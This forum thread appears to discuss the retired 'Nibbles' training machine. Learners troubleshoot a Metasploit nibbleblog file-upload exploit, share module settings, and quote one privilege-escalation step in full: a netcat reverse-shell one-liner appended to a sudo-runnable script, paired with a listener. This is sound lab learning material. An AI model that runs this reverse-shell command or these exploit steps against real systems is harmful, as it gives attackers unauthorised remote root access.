NIbbles

@karelchajim said:
@karelchajim said:
Eh, I am really stuck. I tryied this box several times now. I crawled website, directories, find out xml with username, but I am not able to guess password. Whatever I tryied, i failed. My combos of usr/pwd do not work at all.
Could you please hint me for creds for login page?

nevermind. got it. ■■■

hey bro can you pm hint on pass word i am stuck same as you at this point

Some one help is it becuase this server is retired or i am not able to export exploit some getting this error help

Exploit completed, but no session was created.
msf exploit(multi/http/nibbleblog_file_upload) > exploit

[] Started reverse -----------======
[!] This exploit may require manual cleanup of ‘image.php’ on the target
[
] Exploit completed, but no session was created.
getting

Rooted thank you learned alot trying to root this machine.

rooted

I am also stuck with same issue any solution for this ?

@it4chi said:
I keep getting ‘This exploit may require manual cleanup of ‘image.php’ on the target’ when i try the nibbleblog exploit. Already tried resetting it, did not help.
Any idea what else i can do

Alright, so I got user easily, but I’m having trouble with root. I feel like I’m literally at the last step. I keep running ******.sh as sudo, but get a ‘command not found’ error every time. What am I missing?

EDIT – Nevermind. R00ted. :wink:

Hey laylow, how did you solve this issue?

@laylow said:

Some one help is it becuase this server is retired or i am not able to export exploit some getting this error help

Exploit completed, but no session was created.
msf exploit(multi/http/nibbleblog_file_upload) > exploit

[] Started reverse -----------======
[!] This exploit may require manual cleanup of ‘image.php’ on the target
[
] Exploit completed, but no session was created.
getting

It seems only to be a problem for a few of us running the exploit…
Hope you can help

I rooted this today after having the ‘exploit completed, but no session was created’ problem. I fixed it by typing the following into msfconsole (after selecting the exploit):

set lhost tun0

Simple fix, hopefully works for anyone else who has that problem.

1 Like

Ive gone through everyone’s comment who have the problem
Started reverse -----------======
[!] This exploit may require manual cleanup of ‘image.php’ on the target
Exploit completed, but no session was created.

Ive tried resetting the machine and my vpn connection. Ive had no luck. Ive read through the documentation. Idk what Im doing wrong.

here are my settings on the metasploit too

PASSWORD nibbles yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOSTS 10.10.10.75 yes The target host(s), see https://github.com/rapid7/metasploit-framewo
rk/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /nibbleblog/ yes The base path to the web application
USERNAME admin yes The username to authenticate with
VHOST no HTTP server virtual host

I’ve done this box last weekend as well. If you use some Google Fu you can find an manual exploitation manual. It is well written on that website. Remember that on your Kali probably the well known pentest monkey is available to use while you are exploiting it manually

fixed my error message thanks!

Finally got it. For me, they key was researching Linux commands that weren’t necessarily covered in the lessons leading up to this (running a php file as sudo). Took way too long, but I feel like I learned a lot along the way!

Just my contribution for something I spent several days on:

On the last part of this Machine, right before executing the final sudo and getting root, I ran into error messages no tty present and no askpass program specified and unknown': I need something more specific when trying to execute sudo /home/nibbler/personal/stuff/monitor.sh

I couldn’t figure out what I was doing wrong, and I even found several write-ups that get the errors and seem to proceed like it’s no big deal.

The issue is I did a dumb thing while following the directions in “Nibbles - Privilege Escalation,” and no doubt you may have as well if you’re looking at this post.

The directions say to edit monitor.sh with echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 8443 >/tmp/f' | tee -a monitor.sh

If you do that in /home/nibbler, where you likely will be after executing $ unzip personal.zip to get monitor.sh, you will create another monitor.sh with the echo command in /home/nibbler.

You need to go where monitor.sh is properly located, which is /home/nibbler/personal/stuff/monitor.sh, and execute your echo command by editing monitor.sh there.

Then you will be able to sudo /home/nibbler/personal/stuff/monitor.sh and in a separate parrot terminal, nc -lvnp 8443.

Hope this helps. This was my first Machine, and although I learned quite a bit, I also feel it was a stupid mistake to take so much time to learn!